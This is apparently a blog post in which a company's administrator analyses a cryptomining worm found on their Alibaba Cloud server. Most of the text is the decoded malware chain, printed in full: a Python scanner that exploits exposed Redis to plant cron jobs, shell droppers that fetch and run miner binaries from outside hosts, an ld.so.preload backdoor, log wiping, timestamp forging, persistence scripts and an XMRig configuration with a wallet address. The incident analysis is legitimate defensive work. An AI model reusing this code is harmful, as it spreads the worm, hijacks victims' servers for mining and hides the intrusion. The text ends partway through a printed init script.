A Record of Our Company's Alibaba Cloud Server Being Hacked

1. Discovering the problem

  Our company's Alibaba Cloud account raised four alerts in a row. We suspected someone had broken in and was doing bad things with a Python program, so we logged into the Alibaba Cloud console to take a look.

    Abnormal process behaviour - Linux abnormal file download
    Sensitive file tampering - suspicious tampering of the Linux shared-library preload configuration file
    Malicious process (cloud scan) - mining program
    Abnormal process behaviour - Python application executing abnormal command

2. Finding the attacker's program

  Since one of the alerts was "Abnormal process behaviour - Python application executing abnormal command", first check whether any Python-related process is doing something bad

ps -aux | grep python

  Three related processes turned up

grep --color=auto python

/usr/bin/pytho -Es /usr/sbin/tuned -l -P

python -c import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))

  • The first is our own ps -aux | grep python query; harmless, ignore it
  • The second ran the Python file /usr/sbin/tuned. I opened /usr/sbin/tuned with vim and the file looked fine, but since none of our server programs use Python anywhere, harmless or not, I killed that process too
  • The third looked like bad news at first glance; kill it first and ask questions later

3. Analysing the attacker's program

  After killing it, let's look into what this thing actually does. Judging from the command line, it uses Python to execute a base64-encoded program. Let's base64-decode I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz and see what it is.
  I searched Baidu for a base64 decoder, picked any online one, and found that the decoded content is a Python program

#coding: utf-8
import urllib
import base64

d= 'https://pastebin.com/raw/nYBpuAxT'
try:
    page=base64.b64decode(urllib.urlopen(d).read())
    exec(page)
except:
    pass

  Clearly this Python program fetches the content at https://pastebin.com/raw/nYBpuAxT, base64-decodes it and then runs it. Let's see what that is


  After base64 decoding it is indeed another Python program

#! /usr/bin/env python
#coding: utf-8

import threading
import socket
from re import findall
import httplib

IP_LIST = []

class scanner(threading.Thread):
    tlist = []
    maxthreads = 100
    evnt = threading.Event()
    lck = threading.Lock()

    def __init__(self,host):
        threading.Thread.__init__(self)
        self.host = host
    def run(self):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(5)
            s.connect((self.host, 6379))
            s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
            s.send('config set dir /etc/cron.d\r\n')
            s.send('config set dbfilename root\r\n')
            s.send('save\r\n')
            s.close()
        except Exception:
            pass
        scanner.lck.acquire()
        scanner.tlist.remove(self)
        if len(scanner.tlist) < scanner.maxthreads:
            scanner.evnt.set()
            scanner.evnt.clear()
        scanner.lck.release()

    def newthread(host):
        scanner.lck.acquire()
        sc = scanner(host)
        scanner.tlist.append(sc)
        scanner.lck.release()
        sc.start()

    newthread = staticmethod(newthread)

def get_ip_list():
    try:
        url = 'ident.me'
        conn = httplib.HTTPConnection(url, port=80, timeout=10)
        req = conn.request(method='GET', url='/', )
        result = conn.getresponse()
        ip2 = result.read()
        ips2 = findall(r'\d+.\d+.', ip2)[0]
        for i in range(0, 255):
            ip_list1 = (ips2 + (str(i)))
            for g in range(0, 255):
                IP_LIST.append(ip_list1 + '.' + (str(g)))
    except Exception:
        pass

def runPortscan():
    get_ip_list()
    for host in IP_LIST:
        scanner.lck.acquire()
        if len(scanner.tlist) >= scanner.maxthreads:
            scanner.lck.release()
            scanner.evnt.wait()
        else:
            scanner.lck.release()
        scanner.newthread(host)
    for t in scanner.tlist:
        t.join()

if __name__ == "__main__":
    runPortscan()

  This program is a bit more complex, so let's go through it piece by piece, starting with the functions it defines

  • get_ip_list

      It requests http://ident.me. I tried the site myself: it returns the public IP of whoever visits it, so this gets the Alibaba Cloud host's own IP. A regex then takes the first two octets of that IP and the loops enumerate the last two. For example, if my IP were 192.168.123.213, this would build an IP_LIST array from 192.168.0.0 to 192.168.255.255
  • scanner class

      This class extends threading.Thread. Its main job is to open a socket to port 6379 (the Redis port) on a host and send commands, chiefly set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n, a cron entry that periodically fetches the script at https://pastebin.com/raw/xbY7p5Tb and executes it

      So the program as a whole gets the local machine's IP, keeps its first two octets, brute-forces the last two, connects to port 6379 on every address and sends a cron entry that periodically fetches and runs the script from https://pastebin.com/raw/xbY7p5Tb

      Next, let's analyse the content of the https://pastebin.com/raw/xbY7p5Tb script:
/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/uuYVPLXd|/usr/bin/base64 -d|/bin/bash

  It fetches the content at https://pastebin.com/raw/uuYVPLXd, base64-decodes it and executes it

  After base64 decoding it turns out to be the following shell script, which should be the final payload, the thing that actually does the damage

#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

function kills() {
pkill -f sourplum
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9
pkill -f biosetjenkins
pkill -f AnXqV.yam
pkill -f xmrigDaemon
pkill -f xmrigMiner
pkill -f xmrig
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f bashx
pkill -f bashg
pkill -f bashe
pkill -f bashf
pkill -f bashh
pkill -f XbashY
pkill -f libapache
rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
rm -rf /tmp/conns
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -f /tmp/irq
rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json
netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 5.196.225.222 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
y=$(ps aux | grep -v grep | grep kworkerds | wc -l )
if [ ${y} -eq 0 ];then
	netstat -anp | grep 13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
fi
}

function system() {
	if [ ! -f "/bin/httpdns" ]; then
		curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns
		if [ ! -f "/bin/httpdns" ]; then
			wget  https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns
		fi
		sed -i '$d' /etc/crontab && echo -e "* */6 * * * root /bin/sh /bin/httpdns" >> /etc/crontab
	fi
		
}

function top() {
	if [ ! -f "/usr/local/lib/libntp.so" ]; then
		curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
		if [ ! -f "/usr/local/lib/libntp.so" ]; then
			wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
		fi
	fi
	if [ ! -f "/etc/ld.so.preload" ]; then
		echo /usr/local/lib/libntp.so > /etc/ld.so.preload
	else
		sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libntp.so >> /etc/ld.so.preload
	fi
	touch -acmr /bin/sh /etc/ld.so.preload
	touch -acmr /bin/sh /usr/local/lib/libjdk.so
	touch -acmr /bin/sh /usr/local/lib/libntp.so
	echo 0>/var/spool/mail/root
	echo 0>/var/log/wtmp
	echo 0>/var/log/secure
	echo 0>/var/log/cron
}

function python() {
	nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
	touch /tmp/.tmpa
}

function echocron() {
	echo -e "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /etc/cron.d/root
	echo -e "*/30 * * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/root
	mkdir -p /var/spool/cron/crontabs
	echo -e "* */10 * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/crontabs/root
	touch -acmr /bin/sh /etc/cron.d/root
	touch -acmr /bin/sh /var/spool/cron/crontabs
	touch -acmr /bin/sh /var/spool/cron/root
	touch -acmr /bin/sh /var/spool/cron/crontabs/root
}

function downloadrun() {
	ps=$(netstat -anp | grep 13531 | wc -l)
	if [ ${ps} -eq 0 ];then
		if [ ! -f "/tmp/kworkerds" ]; then
			curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
			if [ ! -f "/tmp/kworkerds" ]; then
				wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
			fi
				nohup /tmp/kworkerds >/dev/null 2>&1 &
		else
			nohup /tmp/kworkerds >/dev/null 2>&1 &
		fi
	fi
}

function downloadrunxm() {
	pm=$(netstat -anp | grep 13531 | wc -l)
	if [ ${pm} -eq 0 ];then
		if [ ! -f "/bin/config.json" ]; then
			curl -fsSL http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
			if [ ! -f "/bin/config.json" ]; then
				wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
			fi
		fi
		if [ ! -f "/bin/kworkerds" ]; then
			curl -fsSL http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
			if [ ! -f "/bin/kworkerds" ]; then
				wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
			fi
				nohup /bin/kworkerds >/dev/null 2>&1 &
		else
			nohup /bin/kworkerds >/dev/null 2>&1 &
		fi
	fi
}

update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH )
if [ ${update}x = "update"x ];then
	rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
	echocron
else
	if [ ! -f "/tmp/.tmpa" ]; then
		rm -rf /tmp/.tmp
		python
	fi
	kills
	downloadrun
	echocron
	system
	top
	sleep 10
	port=$(netstat -anp | grep 13531 | wc -l)
	if [ ${port} -eq 0 ];then
		downloadrunxm
	fi
fi
#
#

  This shell script is more complex. Let's analyse it one piece at a time, going through the functions it defines from top to bottom

  • kills
      Finds a pile of processes and kills them
  • system
      Saves the content of https://pastebin.com/raw/698D7kZU, which is /usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/kDSLjxfQ|/usr/bin/base64 -d|/bin/bash, to the file /bin/httpdns and makes it executable
    https://pastebin.com/raw/kDSLjxfQ is again a base64 blob:
IyEvYmluL3NoClNIRUxMPS9iaW4vc2gKUEFUSD0vdXNyL2xvY2FsL3NiaW46L3Vzci9sb2NhbC9iaW46L3NiaW46L2JpbjovdXNyL3NiaW46L3Vzci9iaW4KCmZ1bmN0aW9uIGRvd25sb2FkcnVuKCkgewoJcHM9JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cHN9IC1lcSAwIF07dGhlbgoJCWlmIFsgISAtZiAiL3RtcC9rd29ya2VyZHMiIF07IHRoZW4KCQkJY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cDovL3RoeXJzaS5jb20vdDYvMzU4LzE1MzQ0OTUxMjd4LTE0MDQ3NjQyNDcuanBnIC1vIC90bXAva3dvcmtlcmRzICYmIGNobW9kICt4IC90bXAva3dvcmtlcmRzCgkJCWlmIFsgISAtZiAiL3RtcC9rd29ya2VyZHMiIF07IHRoZW4KCQkJCXdnZXQgaHR0cDovL3RoeXJzaS5jb20vdDYvMzU4LzE1MzQ0OTUxMjd4LTE0MDQ3NjQyNDcuanBnIC1PIC90bXAva3dvcmtlcmRzICYmIGNobW9kICt4IC90bXAva3dvcmtlcmRzCgkJCWZpCgkJCQlub2h1cCAvdG1wL2t3b3JrZXJkcyA+L2Rldi9udWxsIDI+JjEgJgoJCWVsc2UKCQkJbm9odXAgL3RtcC9rd29ya2VyZHMgPi9kZXYvbnVsbCAyPiYxICYKCQlmaQoJZmkKfQoKZnVuY3Rpb24gZG93bmxvYWRydW54bSgpIHsKCXBtPSQobmV0c3RhdCAtYW5wIHwgZ3JlcCAxMzUzMSB8IHdjIC1sKQoJaWYgWyAke3BtfSAtZXEgMCBdO3RoZW4KCQlpZiBbICEgLWYgIi9iaW4vY29uZmlnLmpzb24iIF07IHRoZW4KCQkJY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cDovL3RoeXJzaS5jb20vdDYvMzU4LzE1MzQ0OTYwMjJ4LTE0MDQ3NjQ1ODMuanBnIC1vIC9iaW4vY29uZmlnLmpzb24gJiYgY2htb2QgK3ggL2Jpbi9jb25maWcuanNvbgoJCQlpZiBbICEgLWYgIi9iaW4vY29uZmlnLmpzb24iIF07IHRoZW4KCQkJCXdnZXQgaHR0cDovL3RoeXJzaS5jb20vdDYvMzU4LzE1MzQ0OTYwMjJ4LTE0MDQ3NjQ1ODMuanBnIC1PIC9iaW4vY29uZmlnLmpzb24gJiYgY2htb2QgK3ggL2Jpbi9jb25maWcuanNvbgoJCQlmaQoJCWZpCgkJaWYgWyAhIC1mICIvYmluL2t3b3JrZXJkcyIgXTsgdGhlbgoJCQljdXJsIC1mc1NMIC0tY29ubmVjdC10aW1lb3V0IDEyMCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5MTc5OHgtMTQwNDc2NDQyMC5qcGcgLW8gL2Jpbi9rd29ya2VyZHMgJiYgY2htb2QgK3ggL2Jpbi9rd29ya2VyZHMKCQkJaWYgWyAhIC1mICIvYmluL2t3b3JrZXJkcyIgXTsgdGhlbgoJCQkJd2dldCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5MTc5OHgtMTQwNDc2NDQyMC5qcGcgLU8gL2Jpbi9rd29ya2VyZHMgJiYgY2htb2QgK3ggL2Jpbi9rd29ya2VyZHMKCQkJZmkKCQkJCW5vaHVwIC9iaW4va3dvcmtlcmRzID4vZGV2L251bGwgMj4mMSAmCgkJZWxzZQoJCQlub2h1cCAvYmluL2t3b3JrZXJkcyA+L2Rldi9udWxsIDI+JjEgJgoJCWZpCglmaQp9CgpmdW5jdGlvbiBpbml0KCkgewoJaWYgWyAhIC1mICIvdXNyL3NiaW4v
a3dvcmtlciIgXTsgdGhlbgoJCWN1cmwgLWZzU0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHA6Ly90aHlyc2kuY29tL3Q2LzM2Mi8xNTM1MTc1MDE1eC0xNDA0ODE3ODgwLmpwZyAtbyAvdXNyL3NiaW4va3dvcmtlciAmJiBjaG1vZCA3NzcgL3Vzci9zYmluL2t3b3JrZXIKCQlpZiBbICEgLWYgIi91c3Ivc2Jpbi9rd29ya2VyIiBdOyB0aGVuCgkJCXdnZXQgaHR0cDovL3RoeXJzaS5jb20vdDYvMzYyLzE1MzUxNzUwMTV4LTE0MDQ4MTc4ODAuanBnIC1PIC91c3Ivc2Jpbi9rd29ya2VyICYmIGNobW9kIDc3NyAvdXNyL3NiaW4va3dvcmtlcgoJCWZpCglmaQoJaWYgWyAhIC1mICIvZXRjL2luaXQuZC9rd29ya2VyIiBdOyB0aGVuCgkJY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cDovL3RoeXJzaS5jb20vdDYvMzYyLzE1MzUxNzUzNDN4LTE1NjY2NTc2NzUuanBnIC1vIC9ldGMvaW5pdC5kL2t3b3JrZXIgJiYgY2htb2QgNzc3IC9ldGMvaW5pdC5kL2t3b3JrZXIKCQlpZiBbICEgLWYgIi9ldGMvaW5pdC5kL2t3b3JrZXIiIF07IHRoZW4KCQkJd2dldCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNjIvMTUzNTE3NTM0M3gtMTU2NjY1NzY3NS5qcGcgLU8gL2V0Yy9pbml0LmQva3dvcmtlciAmJiBjaG1vZCA3NzcgL2V0Yy9pbml0LmQva3dvcmtlcgoJCWZpCglmaQoJY2hrY29uZmlnIC0tYWRkIGt3b3JrZXIKfQoKZnVuY3Rpb24gZWNob2Nyb24oKSB7CgllY2hvIC1lICIqLzEwICogKiAqICogcm9vdCAvdXNyL2Jpbi9jdXJsIGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy94Ylk3cDVUYnxzaFxuIyMiID4gL2V0Yy9jcm9uLmQvcm9vdAoJZWNobyAtZSAiKi8zMCAqICogKiAqCS91c3IvYmluL2N1cmwgLWZzU0wgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hiWTdwNVRifHNoXG4jIyIgPiAvdmFyL3Nwb29sL2Nyb24vcm9vdAoJbWtkaXIgLXAgL3Zhci9zcG9vbC9jcm9uL2Nyb250YWJzCgllY2hvIC1lICIqICovMTAgKiAqICoJL3Vzci9iaW4vY3VybCAtZnNTTCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcveGJZN3A1VGJ8c2hcbiMjIiA+IC92YXIvc3Bvb2wvY3Jvbi9jcm9udGFicy9yb290Cn0KCgp1cGRhdGU9JCggY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0M0WmhRRnJIICkKaWYgWyAke3VwZGF0ZX14ID0gInVwZGF0ZSJ4IF07dGhlbgoJcm0gLXJmIC90bXAvbG9jayogL2Jpbi9rd29ya2VyZHMgL2Jpbi9jb25maWcuanNvbiAvdG1wL2t3b3JrZXJkcyAvcm9vdC9rd29ya2VyZHMKCWVjaG9jcm9uCmVsc2UKCWRvd25sb2FkcnVuCglpbml0CgllY2hvY3JvbgoJc2xlZXAgMTAKCXBvcnQ9JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cG9ydH0gLWVxIDAgXTt0aGVuCgkJZG93bmxvYWRydW54bQoJZmkKZmkKIwoj
  After decoding it is:

#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
function downloadrun() {
	ps=$(netstat -anp | grep 13531 | wc -l)
	if [ ${ps} -eq 0 ];then
		if [ ! -f "/tmp/kworkerds" ]; then
			curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
			if [ ! -f "/tmp/kworkerds" ]; then
				wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
			fi
				nohup /tmp/kworkerds >/dev/null 2>&1 &
		else
			nohup /tmp/kworkerds >/dev/null 2>&1 &
		fi
	fi
}

function downloadrunxm() {
	pm=$(netstat -anp | grep 13531 | wc -l)
	if [ ${pm} -eq 0 ];then
		if [ ! -f "/bin/config.json" ]; then
			curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
			if [ ! -f "/bin/config.json" ]; then
				wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
			fi
		fi
		if [ ! -f "/bin/kworkerds" ]; then
			curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
			if [ ! -f "/bin/kworkerds" ]; then
				wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
			fi
				nohup /bin/kworkerds >/dev/null 2>&1 &
		else
			nohup /bin/kworkerds >/dev/null 2>&1 &
		fi
	fi
}

function init() {
	if [ ! -f "/usr/sbin/kworker" ]; then
		curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -o /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
		if [ ! -f "/usr/sbin/kworker" ]; then
			wget http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -O /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
		fi
	fi
	if [ ! -f "/etc/init.d/kworker" ]; then
		curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -o /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
		if [ ! -f "/etc/init.d/kworker" ]; then
			wget http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -O /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
		fi
	fi
	chkconfig --add kworker
}

function echocron() {
	echo -e "*/10 * * * * root /usr/bin/curl https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /etc/cron.d/root
	echo -e "*/30 * * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/root
	mkdir -p /var/spool/cron/crontabs
	echo -e "* */10 * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/crontabs/root
}


update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH )
if [ ${update}x = "update"x ];then
	rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
	echocron
else
	downloadrun
	init
	echocron
	sleep 10
	port=$(netstat -anp | grep 13531 | wc -l)
	if [ ${port} -eq 0 ];then
		downloadrunxm
	fi
fi
#
#

We'll analyse this one later

  • top
      Saves the image at http://thyrsi.com/t6/365/1535595427x-1404817712.jpg to /usr/local/lib/libntp.so on the server (and at the same time writes that path into /etc/ld.so.preload) and sets its permissions. It looks like an image but is really a shared library; what exactly it does is not yet clear, but my gut says nothing good. It then sets the modification times of the files it just created, /etc/ld.so.preload, /usr/local/lib/libjdk.so and /usr/local/lib/libntp.so, to match /bin/sh (truly nasty)
  • python

    Runs the Python program python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" in the background. This is the Python process we found at the very beginning (so this is where it gets started)
  • echocron

    Writes cron jobs like "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" into three crontab files, /etc/cron.d/root, /var/spool/cron/root and /var/spool/cron/crontabs/root, and likewise sets their modification times to match /bin/sh
  • downloadrun

    Saves the content of http://thyrsi.com/t6/358/1534495127x-1404764247.jpg to /tmp/kworkerds, sets its permissions and runs /tmp/kworkerds in the background. This should be a binary executable rather than a shell script, but whatever it is, it is up to no good
  • downloadrunxm

    Saves the content of http://thyrsi.com/t6/358/1534496022x-1404764583.jpg to /bin/config.json and sets its permissions; this is a JSON file:
{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "av": 0,
    "background": false,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": null,
    "donate-level": 0,
    "huge-pages": true,
    "hw-aes": null,
    "log-file": null,
    "max-cpu-usage": 100,
    "pools": [
        {
            "url": "stratum+tcp://xmr.f2pool.com:13531",
            "user": "47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.xmrig",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": false,
            "variant": 1
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "threads": null,
    "user-agent": null,
    "watch": false
}

  I did not see where this file gets used, but it is presumably related to the shared library and executable above. The function also saves the content of http://thyrsi.com/t6/358/1534491798x-1404764420.jpg to /bin/kworkerds, sets its permissions and runs /tmp/kworkerds in the background

  • Analysing the script as a whole
      With the functions it defines covered, let's see what the script actually does: first kills kills a pile of processes; then downloadrun downloads an executable and runs it in the background; then echocron writes a pile of cron jobs; then system downloads the shared library; then top downloads a shared library and registers it in /etc/ld.so.preload, planting a preload-type malicious shared-library backdoor; after sleeping 10 s, downloadrunxm downloads config.json, downloads the executable /bin/kworkerds and runs it in the background

  • With this shell script analysed, let's look at the shell script that appeared in the system function (the one decoded above)


  This shell script is very similar to the previous one and repeats many of its functions, but there are some changes. Again, let's look at its functions first

downloadrun

  http://thyrsi.com/t6/358/1534495127x-1404764247.jpg的内容保存到/tmp/kworkerds并赋权限然后后台执行 /tmp/kworkerds

downloadrunxm

  Saves the content of http://thyrsi.com/t6/358/1534496022x-1404764583.jpg to /bin/config.json and sets its permissions (this is a JSON file); at the same time it saves the content of http://thyrsi.com/t6/358/1534491798x-1404764420.jpg to /bin/kworkerds and sets its permissions, then runs /tmp/kworkerds in the background.

echocron

  Writes cron jobs in every location it can.

init

  This function was not in the previous script. It saves the content of http://thyrsi.com/t6/362/1535175015x-1404817880.jpg to /usr/sbin/kworker and sets its permissions (this is also an executable), and saves the content of http://thyrsi.com/t6/362/1535175343x-1566657675.jpg to /etc/init.d/kworker and sets its permissions. The latter is a shell script, the service script for kworker, and chkconfig --add kworker registers it to start at boot:

#! /bin/bash
#chkconfig: - 99 01
#description: kworker daemon
